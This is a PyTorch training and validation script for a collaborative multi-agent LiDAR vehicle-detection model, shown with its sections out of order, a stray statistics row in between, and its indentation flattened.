# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent0', config=config, config_global=config_global,
# split='train', center_agent = 0)
# trainset1 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent1', config=config, config_global=config_global,
# split='train', center_agent = 1)
# trainset2 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent2', config=config, config_global=config_global,
# split='train', center_agent = 2)
# trainset3 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent3', config=config, config_global=config_global,
# split='train', center_agent = 3)
# trainset4 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent4', config=config, config_global=config_global,
# split='train', center_agent = 4)
print("Training dataset size:", len(trainset))
if args.mode == 'val':
data_nuscenes = NuscenesDataset(dataset_root=args.data + '/agent0', config=config, split='val', val=True)
padded_voxel_points_example, label_one_hot_example, reg_target_example, reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example, _, _ = data_nuscenes[0]
valset = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
dataset_root=args.data, config=config, config_global=config_global, agent_list = ['/agent0', '/agent1', '/agent2', '/agent3', '/agent4'],
split='val', val=True)
# valset0 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent0', config=config, config_global=config_global,
# split='val', val=True)
# valset1 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent1', config=config, config_global=config_global,
# split='val', val=True)
# valset2 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent2', config=config, config_global=config_global,
# split='val', val=True)
# valset3 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent3', config=config, config_global=config_global,
# split='val', val=True)
# valset4 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent4', config=config, config_global=config_global,
# split='val', val=True)
valloader = torch.utils.data.DataLoader(valset, batch_size=1, shuffle=False, num_workers=1)
# valloader0 = torch.utils.data.DataLoader(valset0, batch_size=1, shuffle=False, num_workers=1)
# valloader1 = torch.utils.data.DataLoader(valset1, batch_size=1, shuffle=False, num_workers=1)
# valloader2 = torch.utils.data.DataLoader(valset2, batch_size=1, shuffle=False, num_workers=1)
# valloader3 = torch.utils.data.DataLoader(valset3, batch_size=1, shuffle=False, num_workers=1)
# valloader4 = torch.utils.data.DataLoader(valset4, batch_size=1, shuffle=False, num_workers=1)
print("Validation dataset size:", len(valset))
# build model
if config.MGDA:
encoder = FeatEncoder()
encoder = nn.DataParallel(encoder)
encoder = encoder.to(device)
optimizer_encoder = optim.Adam(encoder.parameters(), lr=args.lr)
head = FaFMGDA(config)
head = nn.DataParallel(head)
head = head.to(device)
optimizer_head = optim.Adam(head.parameters(), lr=args.lr)
model = [encoder, head]
optimizer = [optimizer_encoder, optimizer_head]
elif config.MIMO:
if layer == 0:
model = FaFMIMONet_32_256_256(config)
elif layer == 1:
model = FaFMIMONet_64_128_128(config)
elif layer == 2:
if config.KD:
model = FaFMIMONet_128_64_64_KD(config)
else:
model = FaFMIMONet_128_64_64(config)
elif layer == 3:
if config.KD:
model = FaFMIMONet_256_32_32_KD(config)
else:
model = FaFMIMONet_256_32_32(config)
model = DDP(model, device_ids = args.rank)
else:
if config.KD:
model = FaFMIMONet_512_16_16_KD(config)
else:
model = FaFMIMONet_512_16_16(config)
model = nn.DataParallel(model)
model = model.to(device)
# specify optimizer
optimizer = optim.Adam(model.parameters(), lr=args.lr)
else:
model = FaFNet(config)
model = nn.DataParallel(model)
model = model.to(device)
# specify optimizer
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# specify creterion
criterion = {'cls': SoftmaxFocalClassificationLoss(), 'loc': WeightedSmoothL1LocalizationLoss()}
if config.KD:
teacher = FaFNet(config)
teacher = nn.DataParallel(teacher)
teacher = teacher.to(device)
fafmodule = FaFModuleKD(model, teacher, config, optimizer, criterion)
checkpoint_teacher = torch.load(args.resume_teacher)
start_epoch_teacher = checkpoint_teacher['epoch']
fafmodule.teacher.load_state_dict(checkpoint_teacher['model_state_dict'])
print("Load teacher model from {}, at epoch {}".format(args.resume_teacher, start_epoch_teacher))
else:
fafmodule = FaFModule(model, config, optimizer, criterion)
if args.resume != '' or args.mode == 'val':
checkpoint = torch.load(args.resume)
model_save_path = args.resume[:args.resume.rfind('/')]
start_epoch = checkpoint['epoch'] + 1
if only_load_model:
start_epoch = 0
if config.MGDA:
fafmodule.encoder.load_state_dict(checkpoint['encoder_state_dict'])
fafmodule.head.load_state_dict(checkpoint['head_state_dict'])
if not only_load_model:
fafmodule.scheduler_encoder.load_state_dict(checkpoint['scheduler_encoder_state_dict'])
fafmodule.optimizer_encoder.load_state_dict(checkpoint['optimizer_encoder_state_dict'])
fafmodule.scheduler_head.load_state_dict(checkpoint['scheduler_head_state_dict'])
fafmodule.optimizer_head.load_state_dict(checkpoint['optimizer_head_state_dict'])
else:
fafmodule.model.load_state_dict(checkpoint['model_state_dict'])
if not only_load_model:
fafmodule.scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
fafmodule.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
print("Load model from {}, at epoch {}".format(args.resume, start_epoch - 1))
if args.mode == 'train':
n_train = len(trainset)
indices = list(range(n_train))
data_cache = {}
for epoch in range(start_epoch, num_epochs + 1):
latency_num = (epoch - 100) / 10
latency_lambda = [latency_num, latency_num, latency_num, latency_num, latency_num]
print('latency of this epoch is', latency_lambda)
# trainset.seq_dict[0] = trainset.get_data_dict(trainset.dataset_root_peragent)
if config.MGDA:
lr = fafmodule.optimizer_head.param_groups[0]['lr']
else:
lr = fafmodule.optimizer.param_groups[0]['lr']
print("Epoch {}, learning rate {}".format(epoch, lr))
if need_log:
saver.write("epoch: {}, lr: {}\t".format(epoch, lr))
saver.flush()
running_loss_disp = AverageMeter('Total loss', ':.6f') # for motion prediction error
running_loss_class = AverageMeter('classification Loss', ':.6f') # for cell classification error
running_loss_loc = AverageMeter('Localization Loss', ':.6f') # for state estimation error
if config.MGDA:
fafmodule.scheduler_encoder.step()
fafmodule.encoder.train()
fafmodule.scheduler_head.step()
fafmodule.head.train()
else:
fafmodule.scheduler.step()
fafmodule.model.train()
step_ct = 1
t = time.time()
# random.shuffle(indices)
train_sampler = torch.utils.data.distributed.DistributedSampler(trainset)
# train_sampler = torch.utils.data.sampler.BatchSampler(torch.utils.data.sampler.SubsetRandomSampler(indices),
# batch_size=batch_size, drop_last=False)
trainloader = torch.utils.data.DataLoader(trainset, shuffle=False, batch_sampler=train_sampler, num_workers=num_workers)
# trainloader1 = torch.utils.data.DataLoader(trainset1, shuffle=False, batch_sampler=train_sampler, num_workers=num_workers)
# trainloader2 = torch.utils.data.DataLoader(trainset2, shuffle=False, batch_sampler=train_sampler, num_workers=num_workers)
# trainloader3 = torch.utils.data.DataLoader(trainset3, shuffle=False, batch_sampler=train_sampler, num_workers=num_workers)
# trainloader4 = torch.utils.data.DataLoader(trainset4, shuffle=False, batch_sampler=train_sampler, num_workers=num_workers)
# for sample0, sample1, sample2, sample3, sample4 in tqdm(zip(trainloader0, trainloader1, trainloader2, trainloader3, trainloader4)):
time_10 = time.time()
for sample in tqdm(trainloader):
time_t0 = time.time()
print("返回时间", time_t0 - trainset.time_4)
# padded_voxel_points0, padded_voxel_points_teacher0, label_one_hot0, reg_target0, reg_loss_mask0, anchors_map0, vis_maps0, target_agent_id0, num_sensor0, trans_matrices0,center_agent = sample
padded_voxel_points0, padded_voxel_points_teacher0, label_one_hot0, reg_target0, reg_loss_mask0, anchors_map0, vis_maps0, target_agent_id0, num_sensor0, trans_matrices0, filename0 = sample[0]['padded_voxel_points'] ,sample[0]['padded_voxel_points_teacher'] ,sample[0]['label_one_hot'] ,sample[0]['reg_target'] ,sample[0]['reg_loss_mask'] ,sample[0]['anchors_map'] ,sample[0]['vis_maps'] ,sample[0]['target_agent_id'] ,sample[0]['num_sensor'] ,sample[0]['trans_matrices'], sample[0]['filename']
padded_voxel_points1, padded_voxel_points_teacher1, label_one_hot1, reg_target1, reg_loss_mask1, anchors_map1, vis_maps1, target_agent_id1, num_sensor1, trans_matrices1, filename1 = sample[1]['padded_voxel_points'] ,sample[1]['padded_voxel_points_teacher'] ,sample[1]['label_one_hot'] ,sample[1]['reg_target'] ,sample[1]['reg_loss_mask'] ,sample[1]['anchors_map'] ,sample[1]['vis_maps'] ,sample[1]['target_agent_id'] ,sample[1]['num_sensor'] ,sample[1]['trans_matrices'], sample[1]['filename']
padded_voxel_points2, padded_voxel_points_teacher2, label_one_hot2, reg_target2, reg_loss_mask2, anchors_map2, vis_maps2, target_agent_id2, num_sensor2, trans_matrices2, filename2 = sample[2]['padded_voxel_points'] ,sample[2]['padded_voxel_points_teacher'] ,sample[2]['label_one_hot'] ,sample[2]['reg_target'] ,sample[2]['reg_loss_mask'] ,sample[2]['anchors_map'] ,sample[2]['vis_maps'] ,sample[2]['target_agent_id'] ,sample[2]['num_sensor'] ,sample[2]['trans_matrices'], sample[2]['filename']
padded_voxel_points3, padded_voxel_points_teacher3, label_one_hot3, reg_target3, reg_loss_mask3, anchors_map3, vis_maps3, target_agent_id3, num_sensor3, trans_matrices3, filename3 = sample[3]['padded_voxel_points'] ,sample[3]['padded_voxel_points_teacher'] ,sample[3]['label_one_hot'] ,sample[3]['reg_target'] ,sample[3]['reg_loss_mask'] ,sample[3]['anchors_map'] ,sample[3]['vis_maps'] ,sample[3]['target_agent_id'] ,sample[3]['num_sensor'] ,sample[3]['trans_matrices'], sample[3]['filename']
padded_voxel_points4, padded_voxel_points_teacher4, label_one_hot4, reg_target4, reg_loss_mask4, anchors_map4, vis_maps4, target_agent_id4, num_sensor4, trans_matrices4, filename4 = sample[4]['padded_voxel_points'] ,sample[4]['padded_voxel_points_teacher'] ,sample[4]['label_one_hot'] ,sample[4]['reg_target'] ,sample[4]['reg_loss_mask'] ,sample[4]['anchors_map'] ,sample[4]['vis_maps'] ,sample[4]['target_agent_id'] ,sample[4]['num_sensor'] ,sample[4]['trans_matrices'], sample[4]['filename']
center_agent = sample['center_agent']
time_t1 = time.time()
print("计时点1", time_t1 - time_t0)
padded_voxel_points_list = [padded_voxel_points0, padded_voxel_points1, padded_voxel_points2, padded_voxel_points3, padded_voxel_points4]
label_one_hot_list = [label_one_hot0, label_one_hot1, label_one_hot2, label_one_hot3, label_one_hot4]
reg_target_list = [reg_target0, reg_target1, reg_target2, reg_target3, reg_target4]
reg_loss_mask_list = [reg_loss_mask0, reg_loss_mask1, reg_loss_mask2, reg_loss_mask3, reg_loss_mask4]
anchors_map_list = [anchors_map0, anchors_map1, anchors_map2, anchors_map3, anchors_map4]
vis_maps_list = [vis_maps0, vis_maps1, vis_maps2, vis_maps3, vis_maps4]
time_t2 = time.time()
print("计时点2", time_t2 - time_t1)
padded_voxel_points = torch.cat(tuple(padded_voxel_points_list), 0)# 因为以前是tensor的list 所以可以
label_one_hot = torch.cat(tuple(label_one_hot_list), 0)
reg_target = torch.cat(tuple(reg_target_list), 0)
reg_loss_mask = torch.cat(tuple(reg_loss_mask_list), 0)
anchors_map = torch.cat(tuple(anchors_map_list), 0)
vis_maps = torch.cat(tuple(vis_maps_list), 0)
time_t3 = time.time()
print("计时点3", time_t3 - time_t2)
target_agent_id_list = [target_agent_id0, target_agent_id1, target_agent_id2, target_agent_id3, target_agent_id4]
num_agent_list = [num_sensor0[-1], num_sensor1[-1], num_sensor2[-1], num_sensor3[-1], num_sensor4[-1]]
trans_matrices_list = [trans_matrices0, trans_matrices1, trans_matrices2, trans_matrices3, trans_matrices4]
trans_matrices = torch.stack(tuple(trans_matrices_list), 1) #
target_agent_ids = torch.stack(tuple(target_agent_id_list), 1)
num_agent = torch.stack(tuple(num_agent_list), 1)
time_t4 = time.time()
print("计时点4", time_t4 - time_t3)
data = {}
data['file_name'] = [filename0, filename1, filename2, filename3, filename4]
data['bev_seq'] = padded_voxel_points.to(device)
time_t5_0 = time.time()
print("计时点5_0", time_t5_0 - time_t4)
data['labels'] = label_one_hot.to(device)
data['reg_targets'] = reg_target.to(device)
data['anchors'] = anchors_map.to(device)
data['reg_loss_mask'] = reg_loss_mask.to(device).type(dtype=torch.bool)
data['vis_maps'] = vis_maps.to(device)
time_t5_1 = time.time()
print("计时点5_1", time_t5_1 - time_t5_0)
data['target_agent_ids'] = target_agent_ids.to(device)
data['num_agent'] = num_agent.to(device)
data['trans_matrices'] = trans_matrices
time_8 = time.time()
time_c = time_8- time_10
time_t5 = time.time()
print("计时点5", time_t5 - time_t4)
print("数据读取时间", time_c)
print("从loader到网络", time_8-trainset.time_4)
time_9 = time.time()
if config.KD:
padded_voxel_points_list_teacher = [padded_voxel_points_teacher0, padded_voxel_points_teacher1, padded_voxel_points_teacher2, padded_voxel_points_teacher3, padded_voxel_points_teacher4]
padded_voxel_points_teacher = torch.cat(tuple(padded_voxel_points_list_teacher), 0)
data['bev_seq_teacher'] = padded_voxel_points_teacher.to(device)
data['kd_weight'] = args.kd
data['layer'] = layer
if config.KD:
loss, cls_loss, loc_loss,kd_loss = fafmodule.step(data, batch_size, center_agent)
else:
loss, cls_loss, loc_loss = fafmodule.step(data, batch_size, center_agent, forcast_num)
running_loss_disp.update(loss)
running_loss_class.update(cls_loss)
running_loss_loc.update(loc_loss)
time_10 = time.time()
print("total_time:", time_10 - time_9)
step_ct += 1
print("\nEpoch {}, Step {}".format(epoch, step_ct))
print("Running total loss: {}".format(running_loss_disp.avg))
print("Running total cls loss: {}".format(running_loss_class.avg))
print("Running total loc loss: {}".format(running_loss_loc.avg))
print("{}\t{}\t{}\t Takes {} s\n".format(running_loss_disp, running_loss_class, running_loss_loc,
str(time.time() - t)))
# save model
if need_log:
if config.KD:
saver.write("{}\t{}\t{}\tkd loss:{} Take {} s\n".format(running_loss_disp,running_loss_class,running_loss_loc,kd_loss,str(time.time()-t)))
else:
saver.write("{}\t{}\t{}\tTake {} s\n".format(running_loss_disp,running_loss_class,running_loss_loc,str(time.time()-t)))
saver.flush()
if config.MGDA:
save_dict = {'epoch': epoch,
'encoder_state_dict': fafmodule.encoder.state_dict(),
'optimizer_encoder_state_dict': fafmodule.optimizer_encoder.state_dict(),
'scheduler_encoder_state_dict': fafmodule.scheduler_encoder.state_dict(),
'head_state_dict': fafmodule.head.state_dict(),
'optimizer_head_state_dict': fafmodule.optimizer_head.state_dict(),
'scheduler_head_state_dict': fafmodule.scheduler_head.state_dict(),
'loss': running_loss_disp.avg}
else:
save_dict = {'epoch': epoch,
'model_state_dict': fafmodule.model.state_dict(),
'optimizer_state_dict': fafmodule.optimizer.state_dict(),
'scheduler_state_dict': fafmodule.scheduler.state_dict(),
'loss': running_loss_disp.avg}
torch.save(save_dict, os.path.join(model_save_path, 'epoch_' + str(epoch) + '.pth'))
elif args.mode == 'val':
# model_save_path = model_save_path + '/epoch_' + str(start_epoch - 1)
# check_folder(model_save_path)
# save_fig_path0 = os.path.join(model_save_path, 'vis_result_agent0')
# save_fig_path1 = os.path.join(model_save_path, 'vis_result_agent1')
# save_fig_path2 = os.path.join(model_save_path, 'vis_result_agent2')
# save_fig_path3 = os.path.join(model_save_path, 'vis_result_agent3')
# save_fig_path4 = os.path.join(model_save_path, 'vis_result_agent4')
# check_folder(save_fig_path0)
# check_folder(save_fig_path1)
# check_folder(save_fig_path2)
# check_folder(save_fig_path3)
# check_folder(save_fig_path4)
# save_fig_path = [save_fig_path0, save_fig_path1, save_fig_path2, save_fig_path3, save_fig_path4]
if config.MGDA:
fafmodule.encoder.eval()
fafmodule.head.eval()
else:
fafmodule.model.eval()
running_loss_disp = AverageMeter('Total loss', ':.6f') # for motion prediction error
running_loss_class = AverageMeter('classification Loss', ':.6f') # for cell classification error
running_loss_loc = AverageMeter('Localization Loss', ':.6f') # for state estimation error
# for local and global mAP evaluation
det_results_local = [[] for i in range(5)]
annotations_local = [[] for i in range(5)]
# for sample0, sample1, sample2, sample3, sample4 in zip(valloader0, valloader1, valloader2, valloader3,
# valloader4):
for sample in valloader:
t = time.time()
center_agent = sample['center_agent']
padded_voxel_points0, label_one_hot0, reg_target0, reg_loss_mask0, anchors_map0, vis_maps0, gt_max_iou0, filename0, \
target_agent_id0, num_sensor0, trans_matrices0, padded_voxel_points_global, reg_target_global, anchors_map_global, gt_max_iou_global, trans_matrices_map = sample[0]['padded_voxel_points'] ,sample[0]['label_one_hot'] ,sample[0]['reg_target'] ,sample[0]['reg_loss_mask'] ,sample[0]['anchors_map'] ,sample[0]['vis_maps'], sample[0]['gt_max_iou'], sample[0]['filename'], sample[0]['target_agent_id'] ,sample[0]['num_sensor'] ,sample[0]['trans_matrices'],sample[0]['padded_voxel_points_global'],sample[0]['reg_target_global'],sample[0]['anchors_map_global'],sample[0]['gt_max_iou_global'],sample[0]['trans_matrices_map']
padded_voxel_points1, label_one_hot1, reg_target1, reg_loss_mask1, anchors_map1, vis_maps1, gt_max_iou1, filename1, target_agent_id1, num_sensor1, trans_matrices1, _, _, _, _, _ = sample[1]['padded_voxel_points'], sample[1]['label_one_hot'] ,sample[1]['reg_target'] ,sample[1]['reg_loss_mask'] ,sample[1]['anchors_map'] ,sample[1]['vis_maps'], sample[1]['gt_max_iou'], sample[1]['filename'], sample[1]['target_agent_id'] ,sample[1]['num_sensor'] ,sample[1]['trans_matrices'],sample[1]['padded_voxel_points_global'],sample[1]['reg_target_global'],sample[1]['anchors_map_global'],sample[1]['gt_max_iou_global'],sample[1]['trans_matrices_map']
padded_voxel_points2, label_one_hot2, reg_target2, reg_loss_mask2, anchors_map2, vis_maps2, gt_max_iou2, filename2, target_agent_id2, num_sensor2, trans_matrices2, _, _, _, _, _ = sample[2]['padded_voxel_points'], sample[2]['label_one_hot'] ,sample[2]['reg_target'] ,sample[2]['reg_loss_mask'] ,sample[2]['anchors_map'] ,sample[2]['vis_maps'], sample[2]['gt_max_iou'], sample[2]['filename'], sample[2]['target_agent_id'] ,sample[2]['num_sensor'] ,sample[2]['trans_matrices'],sample[2]['padded_voxel_points_global'],sample[2]['reg_target_global'],sample[2]['anchors_map_global'],sample[2]['gt_max_iou_global'],sample[2]['trans_matrices_map']
padded_voxel_points3, label_one_hot3, reg_target3, reg_loss_mask3, anchors_map3, vis_maps3, gt_max_iou3, filename3, target_agent_id3, num_sensor3, trans_matrices3, _, _, _, _, _ = sample[3]['padded_voxel_points'] ,sample[3]['label_one_hot'] ,sample[3]['reg_target'] ,sample[3]['reg_loss_mask'] ,sample[3]['anchors_map'] ,sample[3]['vis_maps'], sample[3]['gt_max_iou'], sample[3]['filename'], sample[3]['target_agent_id'] ,sample[3]['num_sensor'] ,sample[3]['trans_matrices'],sample[3]['padded_voxel_points_global'],sample[3]['reg_target_global'],sample[3]['anchors_map_global'],sample[3]['gt_max_iou_global'],sample[3]['trans_matrices_map']
padded_voxel_points4, label_one_hot4, reg_target4, reg_loss_mask4, anchors_map4, vis_maps4, gt_max_iou4, filename4, target_agent_id4, num_sensor4, trans_matrices4, _, _, _, _, _ = sample[4]['padded_voxel_points'],sample[4]['label_one_hot'] ,sample[4]['reg_target'] ,sample[4]['reg_loss_mask'] ,sample[4]['anchors_map'] ,sample[4]['vis_maps'], sample[4]['gt_max_iou'], sample[4]['filename'], sample[4]['target_agent_id'] ,sample[4]['num_sensor'] ,sample[4]['trans_matrices'],sample[4]['padded_voxel_points_global'],sample[4]['reg_target_global'],sample[4]['anchors_map_global'],sample[4]['gt_max_iou_global'],sample[4]['trans_matrices_map']
padded_voxel_points_list = [padded_voxel_points0, padded_voxel_points1, padded_voxel_points2,
padded_voxel_points3, padded_voxel_points4]
label_one_hot_list = [label_one_hot0, label_one_hot1, label_one_hot2, label_one_hot3, label_one_hot4]
reg_target_list = [reg_target0, reg_target1, reg_target2, reg_target3, reg_target4]
reg_loss_mask_list = [reg_loss_mask0, reg_loss_mask1, reg_loss_mask2, reg_loss_mask3, reg_loss_mask4]
anchors_map_list = [anchors_map0, anchors_map1, anchors_map2, anchors_map3, anchors_map4]
vis_maps_list = [vis_maps0, vis_maps1, vis_maps2, vis_maps3, vis_maps4]
gt_max_iou = [gt_max_iou0, gt_max_iou1, gt_max_iou2, gt_max_iou3, gt_max_iou4]
target_agent_id_list = [target_agent_id0, target_agent_id1, target_agent_id2, target_agent_id3,
target_agent_id4]
num_agent_list = [num_sensor0, num_sensor1, num_sensor2, num_sensor3, num_sensor4]
trans_matrices_list = [trans_matrices0, trans_matrices1, trans_matrices2, trans_matrices3, trans_matrices4]
trans_matrices = torch.stack(tuple(trans_matrices_list), 1) #
target_agent_ids = torch.stack(tuple(target_agent_id_list), 1)
num_agent = torch.stack(tuple(num_agent_list), 1)
padded_voxel_points = torch.cat(tuple(padded_voxel_points_list), 0)
label_one_hot = torch.cat(tuple(label_one_hot_list), 0)
reg_target = torch.cat(tuple(reg_target_list), 0)
reg_loss_mask = torch.cat(tuple(reg_loss_mask_list), 0)
anchors_map = torch.cat(tuple(anchors_map_list), 0)
vis_maps = torch.cat(tuple(vis_maps_list), 0)
data = {}
data['bev_seq'] = padded_voxel_points.to(device)
data['labels'] = label_one_hot.to(device)
data['reg_targets'] = reg_target.to(device)
data['anchors'] = anchors_map.to(device)
data['vis_maps'] = vis_maps.to(device)
data['reg_loss_mask'] = reg_loss_mask.to(device).type(dtype=torch.bool)
data['target_agent_ids'] = target_agent_ids.to(device)
data['num_agent'] = num_agent.to(device)
data['trans_matrices'] = trans_matrices
loss, cls_loss, loc_loss, result = fafmodule.predict_all(data, 1, True, center_agent)
# local qualitative evaluation
for k in range(num_sensor0):
data_agents = {}
data_agents['bev_seq'] = torch.unsqueeze(padded_voxel_points[k, :, :, :, :], 1)
data_agents['reg_targets'] = torch.unsqueeze(reg_target[k, :, :, :, :, :], 0)
data_agents['anchors'] = torch.unsqueeze(anchors_map[k, :, :, :, :], 0)
temp = gt_max_iou[k]
data_agents['gt_max_iou'] = temp[0]['gt_box'][0, :, :]
result_temp = result[k]
temp = {'bev_seq': data_agents['bev_seq'][0, -1].cpu().numpy(), 'result': result_temp[0][0],
'reg_targets': data_agents['reg_targets'].cpu().numpy()[0],
'anchors_map': data_agents['anchors'].cpu().numpy()[0],
'gt_max_iou': data_agents['gt_max_iou']}
det_results_local[k], annotations_local[k] = cal_local_mAP(config, temp, det_results_local[k],
annotations_local[k])
filename = str(filename0[0][0])
cut = filename[filename.rfind('agent') + 7:]
seq_name = cut[:cut.rfind('_')]
idx = cut[cut.rfind('_') + 1:cut.rfind('/')]
# seq_save = os.path.join(save_fig_path[k], seq_name)
# check_folder(seq_save)
idx_save = str(idx) + '.png'
# if args.visualization:
# visualization(config, temp, os.path.join(seq_save, idx_save))
print("Validation scene {}, at frame {}".format(seq_name, idx))
running_loss_disp.update(loss)
running_loss_class.update(cls_loss)
running_loss_loc.update(loc_loss)
print("{}\t{}\t{}\t Takes {} s\n".format(running_loss_disp, running_loss_class, running_loss_loc,
str(time.time() - t)))
print("Quantitative evaluation results of model from {}, at epoch {}".format(args.resume, start_epoch - 1))
log_results_file = args.logname + '.txt'
saver_val = open(log_results_file,'w')
det_results_all_local = det_results_local[0] + det_results_local[1] + det_results_local[2] + det_results_local[3]
annotations_all_local = annotations_local[0] + annotations_local[1] + annotations_local[2] + annotations_local[3]
saver_val.write('\noverall local results@iou0.5\n')
mean_ap_local_average, _ = eval_map(det_results_all_local,annotations_all_local,scale_ranges=None,iou_thr=0.5,dataset=None,logger=None)
print(mean_ap_local_average)
saver_val.write(str(mean_ap_local_average))
saver_val.write('\noverall local results@iou0.7\n')
mean_ap_local_average, _ = eval_map(det_results_all_local,annotations_all_local,scale_ranges=None,iou_thr=0.7,dataset=None,logger=None)
print(mean_ap_local_average)
saver_val.write(str(mean_ap_local_average))
#local mAP evaluation
for k in range(4):
saver_val.write('\nlocal{} results@iou0.5\n'.format(k+1))
mean_ap, _ = eval_map(det_results_local[k],annotations_local[k],scale_ranges=None,iou_thr=0.5,dataset=None,logger=None)
print(mean_ap)
saver_val.write(str(mean_ap))
saver_val.write('\nlocal{} results@iou0.7\n'.format(k+1))
mean_ap, _ = eval_map(det_results_local[k],annotations_local[k],scale_ranges=None,iou_thr=0.7,dataset=None,logger=None)
print(mean_ap)
saver_val.write(str(mean_ap))
else:
print('Not implemented yet.')
if need_log:
saver.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', default=None, type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('--resume', default='', type=str, help='The path to the saved model that is loaded to resume training')
parser.add_argument('--resume_teacher', default='/DATA_SSD/slren/teacher_aug_batch_4_epoch_100.pth', type=str, help='The path to the saved teacher model that is loaded to resume training')
parser.add_argument('--kd', default=100000, type=float, help='kd_weight')
parser.add_argument('--model_only', action='store_true', help='only load model')
parser.add_argument('--batch', default=2, type=int, help='Batch size')
parser.add_argument('--nepoch', default=100, type=int, help='Number of epochs')
parser.add_argument('--layer', default=3, type=int, help='Communicate which layer')
parser.add_argument('--nworker', default=0, type=int, help='Number of workers')
parser.add_argument('--lr', default=0.001, type=float, help='Initial learning rate')
parser.add_argument('--log', action='store_true', help='Whether to log')
parser.add_argument('--logpath', default='./log', help='The path to the output log file')
parser.add_argument('--mode', default=None, help='Train/Val mode')
parser.add_argument('--visualization', default=True, help='Visualize validation result')
parser.add_argument('--binary', default=True, type=bool, help='Only detect car')
parser.add_argument('--only_det', default=True, type=bool, help='Only do detection')
parser.add_argument('--logname', default=None, type=str, help='log the detection performance')
parser.add_argument('--forcast_num', default=4, type=int, help='How many frames do you want to use in forcast')
parser.add_argument('--rank', default=0, type=int, help='node rank for distributed training')
parser.add_argument('--ngpus_per_node', default=2, type=int)
parser.add_argument('--gpu', default=2, type=int, help='GPU id to use.')
torch.multiprocessing.set_sharing_strategy('file_system')
args = parser.parse_args()
print(args)
config = Config('train', binary=args.binary, only_det=args.only_det)
config_global = ConfigGlobal('train', binary=args.binary, only_det=args.only_det)
# mp.spawn(main_worker, nprocs=args.ngpus_per_node, args=([args.ngpus_per_node, config, config_global], args))
main(config, config_global, args)
| 64.276018
| 652
| 0.639962
|
from utils.model import forcast_lstm
import random
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.nn.parallel import DistributedDataParallel as DDP
import torch.distributed as dist
import torch.multiprocessing as mp
import numpy as np
import time
import sys
import argparse
import os
from shutil import copytree, copy
from utils.model import MotionNet
from utils.FaFModule import *
from utils.loss import *
from data.data_com_parallel import NuscenesDataset, CarscenesDataset
from data.config_com import Config, ConfigGlobal
from utils.mean_ap import eval_map
from tqdm import tqdm
class AverageMeter(object):
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
def check_folder(folder_path):
if not os.path.exists(folder_path):
os.mkdir(folder_path)
return folder_path
def main(config, config_global, args):
num_epochs = args.nepoch
need_log = args.log
num_workers = args.nworker
only_load_model = args.model_only
forcast_num = args.forcast_num
start_epoch = 1
layer = args.layer
batch_size = args.batch
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '5678'
dist.init_process_group(backend='nccl',rank=1,world_size=2)
torch.cuda.set_device(2)
if args.mode == 'train':
if need_log:
logger_root = args.logpath if args.logpath != '' else 'logs'
time_stamp = time.strftime("%Y-%m-%d_%H-%M-%S")
if args.resume == '':
model_save_path = check_folder(logger_root)
model_save_path = check_folder(os.path.join(model_save_path, 'train_single_seq'))
model_save_path = check_folder(os.path.join(model_save_path, time_stamp))
log_file_name = os.path.join(model_save_path, 'log.txt')
saver = open(log_file_name, "w")
saver.write("GPU number: {}\n".format(torch.cuda.device_count()))
saver.flush()
saver.write("command line: {}\n".format(" ".join(sys.argv[0:])))
saver.write(args.__repr__() + "\n\n")
saver.flush()
copytree('nuscenes-devkit', os.path.join(model_save_path, 'nuscenes-devkit'))
copytree('data', os.path.join(model_save_path, 'data'))
python_files = [f for f in os.listdir('.') if f.endswith('.py')]
for f in python_files:
copy(f, model_save_path)
else:
model_save_path = args.resume[:args.resume.rfind('/')]
torch.load(args.resume)
